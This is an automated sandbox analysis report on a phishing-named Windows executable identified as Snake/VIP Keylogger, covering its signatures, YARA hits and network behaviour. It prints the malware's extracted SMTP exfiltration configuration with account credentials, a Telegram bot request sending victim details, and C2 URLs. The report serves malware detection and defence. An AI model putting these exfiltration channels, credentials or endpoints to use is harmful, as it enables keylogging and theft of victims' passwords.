Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DEC 2024 RFQ.exe

Overview

General Information

Sample name:DEC 2024 RFQ.exe
Analysis ID:1572918
MD5:34b4d7918dc670f64013e5d1f58a85cd
SHA1:dc5af092e9c5b2b38a2e72b03a2784fad36f20e6
SHA256:3a0034689c3ef94d1e243b02eeca73fa564da13b1f09509d9cc290240ccc2b17
Tags:exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DEC 2024 RFQ.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\DEC 2024 RFQ.exe" MD5: 34B4D7918DC670F64013E5D1F58A85CD)
    • RegSvcs.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\DEC 2024 RFQ.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2daa0:$a1: get_encryptedPassword
        • 0x2e028:$a2: get_encryptedUsername
        • 0x2d713:$a3: get_timePasswordChanged
        • 0x2d82a:$a4: get_passwordField
        • 0x2dab6:$a5: set_encryptedPassword
        • 0x307d2:$a6: get_passwords
        • 0x30b66:$a7: get_logins
        • 0x307be:$a8: GetOutlookPasswords
        • 0x30177:$a9: StartKeylogger
        • 0x30abf:$a10: KeyLoggerEventArgs
        • 0x30217:$a11: KeyLoggerEventArgsEventHandler
        00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 16 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  1.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2dca0:$a1: get_encryptedPassword
                  • 0x2e228:$a2: get_encryptedUsername
                  • 0x2d913:$a3: get_timePasswordChanged
                  • 0x2da2a:$a4: get_passwordField
                  • 0x2dcb6:$a5: set_encryptedPassword
                  • 0x309d2:$a6: get_passwords
                  • 0x30d66:$a7: get_logins
                  • 0x309be:$a8: GetOutlookPasswords
                  • 0x30377:$a9: StartKeylogger
                  • 0x30cbf:$a10: KeyLoggerEventArgs
                  • 0x30417:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 15 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-11T08:59:07.568512+010028033053Unknown Traffic192.168.2.449732104.21.67.152443TCP
                  2024-12-11T08:59:10.654855+010028033053Unknown Traffic192.168.2.449734104.21.67.152443TCP
                  2024-12-11T08:59:16.914491+010028033053Unknown Traffic192.168.2.449738104.21.67.152443TCP
                  2024-12-11T08:59:20.091991+010028033053Unknown Traffic192.168.2.449742104.21.67.152443TCP
                  2024-12-11T08:59:23.246084+010028033053Unknown Traffic192.168.2.449746104.21.67.152443TCP
                  2024-12-11T08:59:26.366616+010028033053Unknown Traffic192.168.2.449750104.21.67.152443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-11T08:59:03.225723+010028032742Potentially Bad Traffic192.168.2.449730132.226.247.7380TCP
                  2024-12-11T08:59:05.960090+010028032742Potentially Bad Traffic192.168.2.449730132.226.247.7380TCP
                  2024-12-11T08:59:09.039176+010028032742Potentially Bad Traffic192.168.2.449733132.226.247.7380TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
                  Source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
                  Multi AV Scanner detection for submitted file
                  Source: DEC 2024 RFQ.exeReversingLabs: Detection: 39%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: DEC 2024 RFQ.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: DEC 2024 RFQ.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49731 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
                  Source: Binary string: wntdll.pdbUGP source: DEC 2024 RFQ.exe, 00000000.00000003.1681597343.0000000004290000.00000004.00001000.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1681428891.00000000040F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: DEC 2024 RFQ.exe, 00000000.00000003.1681597343.0000000004290000.00000004.00001000.00020000.00000000.sdmp, DEC 2024 RFQ.exe, 00000000.00000003.1681428891.00000000040F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0008445A
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008C6D1 FindFirstFileW,FindClose,0_2_0008C6D1
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0008C75C
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0008EF95
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0008F0F2
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0008F3F3
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_000837EF
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_00083B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00083B12
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_0008BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0008BCBC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00E9F8E9h1_2_00E9F631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00E9FD41h1_2_00E9FA88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 065831E0h1_2_06582DC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06580D0Dh1_2_06580B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06581697h1_2_06580B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 06582C19h1_2_06582968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0658E0A9h1_2_0658DE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0658E959h1_2_0658E6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0658F209h1_2_0658EF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0658CF49h1_2_0658CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0658D7F9h1_2_0658D550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 065831E0h1_2_06582DBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0658E501h1_2_0658E258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0658EDB1h1_2_0658EB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0658F661h1_2_0658F3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_06580040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0658FAB9h1_2_0658F810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0658D3A1h1_2_0658D0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 065831E0h1_2_0658310E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0658DC51h1_2_0658D9A8

                  Networking

                  barindex
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DEC 2024 RFQ.exe.3c00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2012/12/2024%20/%2005:31:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
                  Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49750 -> 104.21.67.152:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49734 -> 104.21.67.152:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 104.21.67.152:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 104.21.67.152:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 104.21.67.152:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 104.21.67.152:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49731 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\DEC 2024 RFQ.exeCode function: 0_2_000922EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_000922EE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2012/12/2024%20/%2005:31:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 11 Dec 2024 07:59:31 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: DEC 2024 RFQ.exe, 00000000.00000002.1691867622.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4148720897.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002DF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002DEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: RegSvcs.exe, 00000001.00000002.4150184054.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4150184054.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
